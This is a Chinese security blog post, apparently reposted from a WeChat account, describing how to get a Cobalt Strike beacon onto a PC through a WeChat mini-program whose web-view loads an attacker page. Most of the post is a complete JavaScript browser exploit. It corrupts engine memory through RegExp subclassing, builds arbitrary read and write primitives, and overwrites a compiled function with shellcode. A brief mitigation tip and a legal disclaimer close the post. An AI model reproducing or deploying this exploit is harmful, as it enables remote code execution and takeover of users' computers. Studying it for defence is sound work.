Wx最新版本上线cs绕过


前言

标题写吸引人了点(别打我)。其实绕过也不算绕过,wx更新后只允许指定的域名使用内置浏览器(如公众号的:https://mp.weixin.qq.com)。wx小程序开发使用的语言为:WXML(WeiXin Markup Language,wx标记语言)、WXSS(WeiXin Style Sheet,wx样式表)、JS(JavaScript,小程序的主体),需要以浏览器为基础运行,很多接口业务离不开内置浏览器,至于为什么不开启沙箱模式就超出我的认知了,有懂开发的大佬可以指教一下。

注:本文仅提供学习思考方法,切勿进行恶意操作

正文

Shellcode还是原来的shellcode,只是换了个地方使用而已。考虑到有些朋友没有,我附在文末。

准备wx开发者工具:https://developers.weixin.qq.com/miniprogram/dev/devtools/download.html

第一步:创建小程序,AppID 处选择测试号

Wx最新版本上线cs绕过

第二步:编辑 index.html,内容如下

<web-view src="http://youdomain/"></web-view>

这个链接可以指向你云端其他位置的 js,也可以直接写在小程序里面。我比较懒,就直接用之前测试用的了。

Wx最新版本上线cs绕过

 

第三步:点击预览,选择启动PC端自动预览,过一会就会启动小程序了。

Wx最新版本上线cs绕过

当然,打开时会提示域名有风险(正常情况下不要点这类链接),这里只是测试,所以点击继续。

Wx最新版本上线cs绕过

直接上线,复现完成

Wx最新版本上线cs绕过

 

 

shellcode

ENABLE_LOG = true;IN_WORKER = true;
// run calc and hang in a loopvar shellcode = [ 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 ];
// Logging stub: the message is discarded. Nothing in this listing reads
// ENABLE_LOG, so all print() calls are effectively silent.
function print(data) {
    return;
}

// Warm-up target: called 0x10000 times below so the engine compiles it;
// trigger() later looks this function up by name.
var not_optimised_out = 0;
function target_function(value) {
    // One extra increment on a magic argument keeps the branch from being folded away.
    if (value == 0xdecaf0) {
        not_optimised_out += 1;
    }
    not_optimised_out += 1;
    not_optimised_out |= 0xff;
    not_optimised_out *= 12;
}
for (let i = 0; i < 0x10000; ++i) {
    target_function(i);
}

// Shared state for the listing below: g_array is populated by cb(); the two t* constants size the eval'd constructor chain built in oobAccess().
var g_array;var tDerivedNCount = 17 * 87481 - 8;var tDerivedNDepth = 19 * 19;
function cb(flag) {    if (flag == true) {        return;    }    g_array = new Array(0);    g_array[0] = 0x1dbabe * 2;    return 'c01db33f';}
// Allocation churn: creates 0x10000 throwaway String objects and returns nothing.
function gc() {
    let k = 0;
    while (k < 0x10000) {
        new String();
        k += 1;
    }
}
function oobAccess() {    var this_ = this;    this.buffer = null;    this.buffer_view = null;
    this.page_buffer = null;    this.page_view = null;
    this.prevent_opt = [];
    var kSlotOffset = 0x1f;    var kBackingStoreOffset = 0xf;
    class LeakArrayBuffer extends ArrayBuffer {        constructor() {            super(0x1000);            this.slot = this;        }    }
    this.page_buffer = new LeakArrayBuffer();    this.page_view = new DataView(this.page_buffer);
    new RegExp({ toString: function () { return 'a' } });    cb(true);
    class DerivedBase extends RegExp {        constructor() {            // var array = null;            super(                // at this point, the 4-byte allocation for the JSRegExp `this` object                // has just happened.                {                    toString: cb                }, 'g'                // now the runtime JSRegExp constructor is called, corrupting the                // JSArray.            );
            // this allocation will now directly follow the FixedArray allocation            // made for `this.data`, which is where `array.elements` points to.            this_.buffer = new ArrayBuffer(0x80);            g_array[8] = this_.page_buffer;        }    }
    // try{    var derived_n = eval(`(function derived_n(i) {        if (i == 0) {            return DerivedBase;        }
        class DerivedN extends derived_n(i-1) {            constructor() {                super();                return;                ${"this.a=0;".repeat(tDerivedNCount)}            }        }
        return DerivedN;    })`);
    gc();

    new (derived_n(tDerivedNDepth))();
    this.buffer_view = new DataView(this.buffer);    this.leakPtr = function (obj) {        this.page_buffer.slot = obj;        return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);    }
    this.setPtr = function (addr) {        this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);    }
    this.read32 = function (addr) {        this.setPtr(addr);        return this.page_view.getUint32(0, true, ...this.prevent_opt);    }
    this.write32 = function (addr, value) {        this.setPtr(addr);        this.page_view.setUint32(0, value, true, ...this.prevent_opt);    }
    this.write8 = function (addr, value) {        this.setPtr(addr);        this.page_view.setUint8(0, value, ...this.prevent_opt);    }
    this.setBytes = function (addr, content) {        for (var i = 0; i < content.length; i++) {            this.write8(addr + i, content[i]);        }    }    return this;}
function trigger() {    var oob = oobAccess();
    var func_ptr = oob.leakPtr(target_function);    print('[*] target_function at 0x' + func_ptr.toString(16));
    var kCodeInsOffset = 0x1b;
    var code_addr = oob.read32(func_ptr + kCodeInsOffset);    print('[*] code_addr at 0x' + code_addr.toString(16));
    oob.setBytes(code_addr, shellcode);
    target_function(0);}
try{    print("start running");    trigger();}catch(e){    print(e);}

 

处置建议:
看到官方的第三方域名风险提示时,除非来源可信度非常高,否则不要点击继续;有些小程序若被 XSS 挂上恶意链接,可能导致电脑被控。

 

免责申明:

    本项目仅进行信息搜集,漏洞研究工作,无漏洞利用、攻击性行为,发文初衷为仅为方便安全人员学习交流。       请使用者遵守当地相关法律,勿用于非授权测试,勿用于非授权测试,勿用于非授权测试~~(重要的事情说三遍)~~,如作他用所承受的法律责任一概与凌晨安全无关!!!

 

 

本文始发于微信公众号(凌晨安全):Wx最新版本上线cs绕过

